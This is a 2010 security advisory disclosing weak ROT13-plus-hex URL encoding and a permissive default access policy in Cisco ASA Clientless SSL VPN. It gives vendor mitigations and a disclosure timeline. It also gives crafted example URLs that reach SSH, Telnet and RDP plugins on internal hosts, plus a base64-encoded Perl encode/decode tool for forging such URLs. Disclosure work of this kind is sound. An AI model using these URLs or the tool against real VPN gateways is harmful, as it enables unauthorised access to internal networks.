------------------------------------------------------------------ -- -
Cybercom Sweden AB Security Advisory CSESA-2010-8     info@cybercom.com
http://newsroom.cybercom.com/                            George Hedfors
                                                      November 26, 2010
------------------------------------------------------------------ -- -

Vendor: Cisco Inc.
Product: Cisco ASA 5500 Clientless SSL VPN
Vulnerability: Weak URL encoding and dangerous default access policy
Problem type: remote
CVE id(s): N/A

Cisco Clientless SSL VPN (Secure Desktop) can be misconfigured when
disabling the portal toolbar. The Portal toolbar is independent from
filtering the actual browser requests.

This means that all URL's and plugins are by default allowed even if
the administrator only chooses to publish a few bookmarks to key
systems where users should have access. This may lead to the
possibility of giving unintended access to other systems behind the
ASA.

The URL is transliterated to permit encoding of the user URL's. This
URL is then transmitted inside an already established TLS session.
The URL encoding is however easily broken and altered in order to
specify alternative URL's that may be of interest. 

Plugins for Telnet, SSH and remote desktop are also accessible using
static URLs that also are accessible unless they are disabled.

For SSH:
https://vpn.victim.com/+CSCO+0075676763663A2F2F2E637968747661662E++/ssh,telnet/index.html?target=telnet://x.y.z.w:22?csco_lang=en

For Telnet:
https://vpn.victim.com/+CSCO+0075676763663A2F2F2E637968747661662E++/ssh,telnet/index.html?target=telnet://x.y.z.w:22?csco_lang=en

For RDP:
https://vpn.victim.com/+CSCO+0075676763663A2F2F2E637968747661662E++/rdp/index.html?target=rdp://x.y.z.w/?geometry=1280x800&FullScreen=true&csco_lang=en

The URL obfuscation is done using the good old Caesar cipher, first
used around the year 56AD (according to Wikipedia) with an
overlaying HEX encoding.

Obfuscation example:
https://vpn.victim.com/+CSCO+00756767633A2F2F7A6E76792E69767067767A2E70627A2F726B70756E617472++/
^ ^ ^
uggc://znvy.ivpgvz.pbz/rkpunatr
^ ^ ^
http://mail.victim.com/exchange

Vendor recommendation:
Configure Assign the web ACL to any policies (group policies, dynamic
access policies, or both) that you have configured for clientless
access.
Please follow the guidelines posted in:
ASA Configuration Guide: Configuring Clientless SSL VPN
http://www.cisco.com/en/US/docs/security/asa/asa83/configuration/guide/webvpn.html

Vulnerability report timeline:
8, October 2010 - Initial vulnerability submission
8, October 2010 - Vendor response
4, November 2010 - Vulnerability redefined
17, November 2010 - Vendor provides workaround and suggested mitigations
26, November 2010 - Advisory and workaround release

Cisco bug IDs:
CSCtk08440    ASDM: When portal toolbar is removed, ASDM should point to
WebACL config
CSCtk08633    ASA doc "url-entry" needs to include reference to WebACL

References:
http://www.cisco.com/en/US/docs/security/asdm/6_2/user/guide/vpn_web.html#wp1072626
http://en.wikipedia.org/wiki/Caesar_cipher

Attached URL encode/decode tool (MIME):
IyEvdXNyL2Jpbi9wZXJsCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
IyMjIyMKIyMgIENpc2NvIFNTTCBWUE4gVVJMIGVuY29kZXIvZGVjb2RlcgojIyAgYnkgZ2Vvcmdl
LmhlZGZvcnMgYXQgY3liZXJjb21ncm91cC5jb20KIyMKIwojIFNhbXBsZSBVUkw6CiMgaHR0cHM6
Ly92cG4udmljdGltLmNvbS8rQ1NDTyswMDc1Njc2NzYzM0EyRjJGN0E2RTc2NzkyRTY5NzY3MDY3
NzY3QTJFNzA2MjdBMkY3MjZCNzA3NTZFNjE3NDcyKysvCiMKIyBVc2UgdGhpcyBzY3JpcHQgdG8g
ZW5jb2RlL2RlY29kZSB0aGUgaGV4IGNodW5rIGFzIGFib3ZlCiMgRXhhbXBsZToKIyAuL2Npc2Nv
X3Zwbi5wbCBkIDAwNzU2NzY3NjMzQTJGMkY3QTZFNzY3OTJFNjk3NjcwNjc3NjdBMkU3MDYyN0Ey
RjcyNkI3MDc1NkU2MTc0NzIKIwoKbXkgJE9GRlNFVCA9IDEzOwoKbXkgJElOU1RSID0gJEFSR1Zb
MV07CgpteSAkYzsKbXkgJE9VVFNUUjsKCmlmKCRBUkdWWzBdIGVxICJlIikgewoJZm9yIChteSAk
aSA9IDA7ICRpIDwgbGVuZ3RoKCRJTlNUUik7ICRpKyspIHsKCQkkYyA9IG9yZChzdWJzdHIoJElO
U1RSLCAkaSwgMSkpOwoKCQlpZihjaHIoJGMpID1+IG0vW2Etel0vKSB7CgkJCSRjIC09ICRPRkZT
RVQ7CgkJCWlmICgkYyA8IDk3KSB7ICRjICs9IDI2IH0KCQl9IGVsc2lmKGNocigkYykgPX4gbS9b
QS1aXS8pIHsKCQkJJGMgLT0gJE9GRlNFVDsKCQkJaWYgKCRjIDwgNjUpIHsgJGMgKz0gMjYgfQoJ
CX0KCgkJJE9VVFNUUiAuPSBjaHIoJGMpOwoJCSRPVVRIRVggLj0gc3ByaW50ZigiJTAyWCIsICRj
KTsKCX0KCXByaW50ICRPVVRTVFIgLiAiXG4iIGlmICRBUkdWWzJdIGVxICItZCI7CglwcmludCAi
MDAiIC4gJE9VVEhFWCAuICJcbiI7Cn0gZWxzaWYoJEFSR1ZbMF0gZXEgImQiKSB7Cglmb3IgKG15
ICRpID0gMDsgJGkgPCBsZW5ndGgoJElOU1RSKTsgJGkrPTIpIHsKCQkkYyA9IGhleChzdWJzdHIo
JElOU1RSLCAkaSwgMikpOwoKCQlpZihjaHIoJGMpID1+IG0vW2Etel0vKSB7CgkJCSRjICs9ICRP
RkZTRVQ7CgkJCWlmICgkYyA+IDEyMikgeyAkYyAtPSAyNiB9CgkJfSBlbHNpZihjaHIoJGMpID1+
IG0vW0EtWl0vKSB7CgkJCSRjICs9ICRPRkZTRVQ7CgkJCWlmICgkYyA+IDkwKSB7ICRjIC09IDI2
IH0KCQl9CgoJCSRPVVRTVFIgLj0gY2hyKCRjKTsKCX0KCXByaW50ICRPVVRTVFIgLiAiXG4iOwp9
IGVsc2UgewoJcHJpbnQgU1RERVJSICJzeW50YXg6ICQwIGVcfGQgc3RyaW5nXHxoZXhcbiI7Cglw
cmludCBTVERFUlIgIlx0ZSAtIGVuY29kZSBzdHIgdG8gaGV4XG4iOwoJcHJpbnQgU1RERVJSICJc
dGQgLSBkZWNvZGUgaGV4IHRvIHN0clxuXG4iOwoJZXhpdCAtMTsKfQo=

------------------------------------------------------------------ -- -

George Hedfors
IT- & Information Security Consultant

Cybercom Sweden East AB
Lindhagensgatan 126   Box 30154   SE-104 25 Stockholm
Phone +46 8 726 75 00   Fax +46 8 19 33 22

PGP: 0x0A13FDB8/79A9 D843 B792 1EA3 B8C6 
                F792 D480 84DE 0A13 FDB8